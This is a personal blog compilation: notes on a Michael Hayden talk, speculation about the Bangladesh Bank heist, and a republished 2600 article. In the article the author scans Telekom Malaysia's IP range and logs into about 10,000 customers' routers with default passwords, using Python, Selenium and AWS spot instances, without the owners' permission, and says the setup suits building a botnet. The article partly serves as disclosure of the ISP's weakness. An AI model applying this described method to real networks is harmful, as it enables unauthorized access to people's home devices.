Michael Hayden on interesting points

Some interesting points:

  1. Non-nation state actors now pose a significant threat to nation states
  2. Historical threats usually associated with bad nation states, can now be executed by non nation-states
  3. Industrial Era, was about a consolidation of power, in the past only the Government could run something as complex as a phone network
  4. In a Post-Industrial Era, it’s about the decentralization or power–today, modern economies privatize and decentralize important things like the phone network. (my comment: The internet is the epitome of this, a fully decentralized network controlled by no one single entity)
  5. American Foreign Policy, Power Projection and Defence has been fully focused on hard power against nation states (hard power =  men with guns)
  6. In order to address the threat of non nation-states, the US government has pivoted it’s attack vectors and tactics
    • Yesterday  : Killing someone from a foreign army in a designated war-zone
    • Today : Drone Strikes on enemy combatants that aren’t fully recognized
    • Yesterday  : Capturing Foreign combatants and imprisoning them
    • Today : Guantanamo
    • Yesterday : Intercepting enemy communications, disabling and sabotaging
    • Today : Programs that Edward Snowden revealed
    • (my comment: I don’t think the full surveillance of domestic internet traffic was a good idea)
  7. We’re seeing the melting down of Post WW2 and Post WW1 global order, and maybe even the breakdown of Westphalian nation-states…ISIS is a response to Westphalian ideas of separation of church and state.
  8. There is a fundamental similarity between what Christian Europe faced in the 16th-17th century and what the middle east today, both sides are debating the relationship between religion and power.
  9. Christian Europe had the answer of separating them—we call this separation, modern!
  10. No guarantee that Islam in the Middle East will come to the same conclusion, i.e. they may never become modern.
  11. Less important stuff about Nuclear power, about how Russia is adopting a Nuclear first option, and considering it de-escalatory. And Hayden doesn’t like the Iran Deal, and not a big fan of Pakistan.
  12. American foreign policy makers like Hayden are more concerned with Chinese failure than with Chinese success. Political, Economical and Social factors may hamper the growth of China, but a failure of the regime is going to a massive problem for the world, while a success for China would a relatively smaller impact that can easily be folded into the world order.
  13. The Chinese claims on the 9-dash line, is a nationalistic approach to remedy the economical slowdown (Hayden’s opinion), what’s more interesting is that this is a diplomatic error, and ASEAN countries are running back to America to balance China’s power.
  14. Fundamentally though, China has no reason to be an enemy of the US
  15. His last slide on American foreign policy, the 4 different president types, as a fan of Wilson, and a World War 1 History freak—that was awesome!! I think one of the best historically precise frameworks for understanding US foreign policy, that isn’t based just the last 20 years
  16. Only one country supports targetted killings by the US—Israel.

Anonymity and IP addresses

anonymous_guy_fawkes

This week, I’ll put the final touches on my move from Malaysia to Singapore.

So, I felt it would a good idea to read through some Singaporean tech articles to see how tech events played out on the little red dot, and offer some unsolicited  and completely useless advice on them.

It wasn’t easy shifting through a boat-load of gadget reviews masquerading as tech journalism (I guess some things are the same in every country), but underneath the hundreds of phone reviews and fiber broadband comparison, I found a little interesting report on illegal downloads.

The Singapore Straits time reports that:

A local law firm that started proceedings to go after illegal downloaders in Singapore on behalf of two Hollywood studios said it will cooperate with the local authorities to ensure no abuse of process.

It follows a rare intervention by the Attorney-General’s Chambers (AGC) in civil applications made by Samuel Seow Law Corp (SSLC) in the High Court last month.

“We will work with the local authorities to ensure that there will be no unnecessary alarm to consumers who receive the letters of demand we plan to send out,” Mr Samuel Seow, managing director of SSLC, told The Straits Times yesterday.

This is just a re-hashed version of what happened last year in Singapore, when the same law firm went after downloaders of another movie, the difference is that this time they’ll be doing it under the watchful eyes of the AGC.

There is something to be said here about copyright-trolling, the abuse of power and the bullying tactics usually involved. But, we’ll leave that discussion for another day.

Today, I want to explore a little bit about anonymity and how many people have a mistaken notion about what it is. Continue reading

Random thoughts

You’ve probably heard of the hackers who almost got away with $1 billion, only to be thwarted by a typo. (if it weren’t for those meddling keyboards!)

What you probably didn’t hear was that they had already wired $100 million to themselves, are assumed to have pocketed anywhere from $21 million to $81 million in cold hard cash.

Sure, Billions is more than millions, but one a single hack that returns $21 million is a good pay-day by anyone’s standards.

The group managed to hack into the Bangladesh Central Bank, and gained access to specific machines on their network. From there they wired payment instructions over the Swift network to transfer nearly $1 Billion dollars in cash, all from a bank with just $28 Billion in foreign exchange reserves.

These were not 2-bit hackers who were foiled by typo’s, this was a well targeted attack, that would have probably occurred even if the bank upgraded their switches from $10 D-links to $100,000 Cisco routers, it wouldn’t have made a difference. The BAE report on the breach made for some interesting bed-time reading, but what really struck me was that the hackers were smart enough to suppress print-outs of confirmations, thereby ensuring no bank employees knew of the breach.

Each payment instruction generates a paper print out for employees to verify physically, but because that paper printout was generated by the same comprimised software, it was trivial to suppress.

But Hacking is one thing, knowing how to wire the money anonymously in a heavily regulated banking system is another.

The hackers had figured out that the best way to smuggle out millions of dollars was via casinos in the Philippines, that aren’t covered by anti money-laundering laws. This knowledge isn’t something that appears on last week’s Jeopadry, or a question you pose on Reddit, it’s something that only insiders know about.

Oh, and by the way, another $20 million was routed to Sri Lanka, suggesting there are other avenues to launder money out of the system from that Island nation as well.

But just who are these sophisticated hackers?

The Philippines Senators who had a hearing on the incident suggested that the perpetrators ‘could’ be Chinese. And while there’s probably a conflict of interest in their statement (nobody wants to admit that there are criminals in their own borders), evidence does seem to suggest it’s at least a likelihood.

And if I were to put on my tin-foil hat for a while, we may be able to correlate this attack to something that occurred late last year, keep in mind though this is venturing deep in the crazy woman with cat territory, and you have been warned.

So with that warning, let me take you back to good ol’ 2015.

In September of that year, President Obama and President Xi had a ‘broad agreement’ that both nations will no longer hack each other for ‘commercial purposes’. Nationwide espionage and intelligence gathering was still OK, but intentionally targeting corporations for their intellectual property was not.

Of course, the agreement was a bit vague on specifics, if Chinese hackers were to target Lockheed Martin to obtain the designs for the F-35 fighter — would that be considered commercial?

But overall the agreement was clear that both countries would not use hacking to advance their commercial interest. Keep in mind, that both countries vehemently denied they ever did this, so in essence the statement was merely formalizing something both countries have always denied doing–sort of saying we promise never to do the things we never did in the first place.

To give you a flavor of corporate espionage, I recommend reading a brilliant post titled “Stealing White” by Del Quintin Wilber from Bloomberg. It’s a long read (almost 4000 words long), which involves a Malaysian trying to steal the secrets of Titanium Dioxide production from Dupont. Apparently Titanium Dioxide makes a perfect white, that is the envy of all other whites, but the plot of stealing the manufacturing secrets of this perfect white is elaborate enough to make Wile E. Coyote green with envy, and just like in the cartoons it fails.

The Bloomberg piece concludes with an interesting point “the Chinese may have gotten what they needed directly from the chemical company. Newly filed court documents reveal that the FBI motel raid found evidence DuPont’s computers had been hacked.”

So elaborate espionage didn’t work as effectively as simply hacking into the source and getting it directly, and for a long time it was assumed that these breaches were executed by the hackers from the Chinese Government themselves. Think of it as a special arm dedicated to corporate espionage.

Of course, let me re-iterate that this is merely hypothetical, and let’s also not forget that the Snowden leaks suggest that the NSA was also in on the corporate espionage game, and spied on Corporate entities like Brazil’s Petrobras.

And here’s where the tin-foil comes in.

If China did indeed have a corporate espionage arm (not saying they did), and that arm was disbanded back in September due to the agreement with the US–what would happen exactly?

Well you’d think hundreds (if not thousands) of well-trained hackers, who specialized in the breaching of corporate networks would soon be out of jobs. And since hacking, especially government level hacking, isn’t exactly a generic skill set you can use to job-hop around, the most likely scenario would be that these hackers soon become freelancers.

And freelancers sooner or later coalesce into well organized teams which high levels of knowledge and expertise.

But what kind of heist could a group of well-trained, highly skilled, out of a job hackers do?

Hypothetically they could infiltrate a financial organization and start routing money to themselves–maybe? Identifying flaws in the global monetary system and using them to steal about $1 Billion from bank in Bangladesh?

Just maybe.

 

2600 article

*A republication of my article on 2600, a hacker magazine*

Greetings from Malaysia.

This is my first time writing to 2600, although I’ve been a kindle subscriber for more than 2 years now.

For my first article, I hoped to write about a little hacking expedition I embarked on a couple of months back to help me improve my coding skills as well as help me learn more about local internet users.

Malaysia got onto the internet scene much later than most developed countries, our first ISP was only founded in 1992, and even then it was pretty much exclusively dial-up. Soon the local telecom company, Telekom Malaysia (TM) got into the ISP business and basically killed every other player because as the incumbent Government-owned telecommunications company, it alone had access to the phone lines of every Malaysian household.Until very recently, phone lines in Malaysia were owned by the Federal government through Telekom Malaysia, and it was only in the late 90’s that a privatisation plan opened that up.

During the days of dial-up over PSTN, and even after ADSL connectivity (which still ran over PSTN lines), TM held a monopoly over all internet subscribers in the country, simply because it owned the phone lines. Other ISPs struggled to penetrate the market, because their offerings couldn’t compete with the scale and unfair advantage of TM.

Fortunately, that all changed when TM was laying down fiber-optic cables. As part of a deal, TM secured a government subsidy to fund the fibre infrastructure but was forced to allow other ISPs to utilize the last-mile. In theory this would have increased competition and provided a more level playing field–which it did. But, TM was slow in opening up the last-mile, and manage to get a head-start of around 400,000 subscribers before any other ISP began to offer a Fiber to Home internet connection.

Why am I telling you this?

Because TM doesn’t really prioritize security, and I discovered a near perfect storm of security lapses that may prove costly to TM at some point.

As a ‘legacy’ ISP in the country, TM was around when IP addresses were cheap, and IPv4 exhaustion was a prediction not a reality. Hence it managed to secure for itself nearly 2.5 Million IP addresses from IANA. This abundance of IP addresses meant that TM offers all its customers a public facing internet IP by default, something all other ISPs in Malaysia offer only on request of the subscriber. I won’t go into the details of NAT-ing here, but you can Google it if you’re interested.

Secondly, as part of a Fibre subscription, TM provide a Modem and WiFi router, which is nothing out of the ordinary, except that TM sourced all their routers from just 2 manufacturers, and each manufacturer provided only 1 router model. From a security stand-point having an entire population of a single device isn’t a good thing, because a single exploit could take them all out at once, akin to the super-viruses we hear about that could make entire crops extinct because there’s so little genetic biodiversity in industrial agriculture.

Thirdly, TM provide a TV box for free and paid channels streamed to your TV. Problem is, that the TV box requires a complex VLAN segmentation and setup on the router, meaning most routers won’t support the TM Fiber offering. This forced most (or all) TM subscribers to continue using whatever router TM provided them in the first place, without the ability to swap the router for a more secure or feature rich one.

All in all, this meant that all of TM’s 600,000 fibre subscribers (at the time of writing this) were connected directly to the internet via a Public IP, and most of them continued to use one of the two routers supplied by them.

So far, nothing too exceptional here, except for two last bits. All the routers were configured to allow access from the WAN interface (i.e. you could configure the router from the internet), and all the routers were setup with one of a 5 different username/password combination by default. The default passwords (as you may have guessed) were rarely changed, and most users were left completely vulnerable to attack on a device they never even considered would be a target.

In 2007, while the fiber offering was still very new, several hackers in the Malaysia alerted TM to the ‘flaw’ in their operating model, but TM maintained that the WAN interface was necessary for ‘maintenance and support’, although they did promise to change all passwords to a unique password per router.So here we are in 2015, and I wanted to see just how honest TM were in keeping that promise.

First I had to get the list of IP addresses that belong to TM, a quick Google search revealed that TM was AS4788. AS stands for Autonomous System, a sort of internal network within the internet and used primarily for BGP routing. BGP is the border gateway protocol, which defines how IP packets are routed between AS nodes, and the great thing about it is that all this information is public, meaning you can easily determine TM’s IP addresses.

Once I had the list of IP addresses I quickly created a python script to loop through each individual IP, and determine the http-header of the end device on that IP (if there was one in the first place). I queried only port 8080, to save time. Since TM had only 2 router models, it was pretty trivial to validate the http-header and see if the IP was hosting a vulnerable TM router. A more professional approach would be to use zmap, or Shodan, but creating your own scripts to do this has it’s advantages in learning.

IP scanning was easy, and determining if indeed a particular router was on port 808o of a specific IP address wasn’t a tall hurdle to cross. The much harder portion was to actually test the hypothesis that most of the routers still used the default usernames and passwords. This meant I had to actually post data via http into the page from my python script. This isn’t usually a difficult task, but the routers themselves operated a large amount of javascript, and that just threw my python scripts into a tail-spin.

Try as I might, I couldn’t get it working using just python. Eventually I gave up trying to navigate the routers homepage, but then I found Selenium.

Selenium is a tool that allows you to “create robust, browser-based regression automation suites and tests”, in otherwords Selenium allows you to control a browser like FireFox or Chrome from a python script. This was the holy grail, because the web-browser would take care of all the Javascript nastiness for me, and now I could go deeper into the router configuration settings and poke around to determine other things, like do people even bother to change their WiFi SSID and password?

But Selenium has a performance drawback, a single python script querying a webpage, takes a couple MB of RAM, but a entire instance of Firefox kept open could consume a a few hundred megabytes, which severely limited my ability to scale the scanning. Even after discovering the tool, I tried to go back to just native python, but that Javascript stuff just threw me off.

Eventually, I wrote a whole script in Python, that would scan an IP range, determine if a router was present at the end of the IP (on port 8080), and then pass that to another script that would use Selenium to interact with a Firefox browser to visit the routers webpage, try the handful of default username/passwords and determine if any of them worked. And they DID!!

Of course, while I was in, I poked around to determine things like WiFi SSIDs, etc, but mostly for fun, and I made it a point not to change any setting on the router.

But there’s no way I could scale all of this on my home PC, or even my laptop. So, I decided to host this on the cloud, and chose to use Amazon–specifically a Windows instance on Amazon.

Initially, I decided to host this in Singapore–made sense since I was visiting Malaysians IPs, but then I realized that the Oregon data center of Amazon had much cheaper rates than the Singapore one–so I changed my decision and hosted in Oregon instead. IN some cases this was a 20% reduction in cost, and the expense of ‘slightly’ more latency, but my application wasn’t latency sensitive, as much as I was price-sensitive 🙂

Then in true, cheap-skate fashion, I decided to toy with Amazon spot instances–this a special deal from Amazon, where they would lease you un-utilized machines to the highest bidder, and you can get this for nearly 50% the price of the ‘on-demand’ Amazon instance. The only down-side is that Amazon reserves the right to terminate your instance at anytime–but from my experience of using this, and from the blogs I read, the chances of that happening were pretty slim.

I’ve run nearly 10 of these so far, and every time I spin up a spot-instance, it’s never been auto-terminated. Pretty decent deal–the only real down-side is that a spot-instance usually takes about 3-5 minutes to launch, due to the bid processing. But other than that it’s as good as a on-demand instance 🙂

With a very powerful Amazon instance, that had a large amount of RAM, I could spin up a large number of instances of Firefox to do my bidding. Using a simple Database to ensure all the instances weren’t visiting the same IP addresses, I was able to automate the whole process of ‘visiting’ TM routers with ease.

Eventually, a single large Amazon instance (procured through a spot-instance method), was able to hack through 10,000 routers in less than 12 hours for under $10.00. Quite a good return of investment if you’re looking to create your own little bot-net army.

TM have especially dropped the ball here, they now have at least 10,000 vulnerable routers floating on their network, waiting to be owned by the next Lizard Squad characters. I could have easily configured my script to turn-off the WAN interface on the router, to limit people’s exposure, but I thought against making changes on a host system without the owners explicit permission.

Hopefully if you’re from Malaysia and a TM subscriber, now you know, and you’re that yourself.

Selamat Tinggal from Malaysia.